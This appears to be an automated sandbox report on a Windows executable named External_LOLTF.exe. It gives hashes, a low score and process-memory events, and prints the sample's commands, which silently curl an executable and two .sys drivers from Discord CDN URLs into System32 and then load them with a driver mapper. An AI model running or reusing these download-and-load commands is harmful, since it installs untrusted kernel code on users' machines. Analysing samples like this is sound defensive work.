9e7a6d108771792d4e530145b098098f9b392ae52669b239f1479e72d48c09ca

Resubmissions

02/03/2023, 17:22

02/03/2023, 17:20

02/03/2023, 17:19

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
02/03/2023, 17:20

Target

External_LOLTF.exe
Size

346KB
MD5

c229b08930961689fa299697e3c59636
SHA1

37ca9b0b845d541d5d13df2bbad7c5954829105c
SHA256

9e7a6d108771792d4e530145b098098f9b392ae52669b239f1479e72d48c09ca
SHA512

5ca4d97e4882e3a6aa5ffffeb2dbef89cf9dcccd2bcddb3ef028cb00d2f6cc0a6727b12cfda76d34fce10dd5f15c59fe6cbb058f19eb5e358554f7ae4d49f82f
SSDEEP

6144:mOuhm8hkidfQUCkNI8ClDvv5ZcS7UnuZ:es8lfjCkNNULxUn

Score

1^/10

Suspicious behavior: EnumeratesProcesses 64 IoCs

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 920 wrote to memory of 1768	920	External_LOLTF.exe	29
PID 920 wrote to memory of 1768	920	External_LOLTF.exe	29
PID 920 wrote to memory of 1768	920	External_LOLTF.exe	29
PID 920 wrote to memory of 876	920	External_LOLTF.exe	30
PID 920 wrote to memory of 876	920	External_LOLTF.exe	30
PID 920 wrote to memory of 876	920	External_LOLTF.exe	30
PID 920 wrote to memory of 520	920	External_LOLTF.exe	31
PID 920 wrote to memory of 520	920	External_LOLTF.exe	31
PID 920 wrote to memory of 520	920	External_LOLTF.exe	31
PID 920 wrote to memory of 1504	920	External_LOLTF.exe	32
PID 920 wrote to memory of 1504	920	External_LOLTF.exe	32
PID 920 wrote to memory of 1504	920	External_LOLTF.exe	32
PID 920 wrote to memory of 844	920	External_LOLTF.exe	33
PID 920 wrote to memory of 844	920	External_LOLTF.exe	33
PID 920 wrote to memory of 844	920	External_LOLTF.exe	33
PID 920 wrote to memory of 476	920	External_LOLTF.exe	34
PID 920 wrote to memory of 476	920	External_LOLTF.exe	34
PID 920 wrote to memory of 476	920	External_LOLTF.exe	34
PID 920 wrote to memory of 1108	920	External_LOLTF.exe	35
PID 920 wrote to memory of 1108	920	External_LOLTF.exe	35
PID 920 wrote to memory of 1108	920	External_LOLTF.exe	35
PID 920 wrote to memory of 1920	920	External_LOLTF.exe	36
PID 920 wrote to memory of 1920	920	External_LOLTF.exe	36
PID 920 wrote to memory of 1920	920	External_LOLTF.exe	36

C:\Users\Admin\AppData\Local\Temp\External_LOLTF.exe
"C:\Users\Admin\AppData\Local\Temp\External_LOLTF.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1041529063682080839/1045899335017185400/drvmapper.exe --output C:\Windows\System32\drvmapper.exe >nul 2>&1
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1080897844556337165/1080897946947694713/BE.sys --output C:\Windows\System32\BE.sys >nul 2>&1
  2⤵
  PID:876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1080897844556337165/1080897958968569966/EAC.sys --output C:\Windows\System32\EAC.sys >nul 2>&1
  2⤵
  PID:520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd C:\Windows\System32\
  2⤵
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\drvmapper.exe C:\Windows\System32\BE.sys C:\Windows\System32\EAC.sys
  2⤵
  PID:476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1920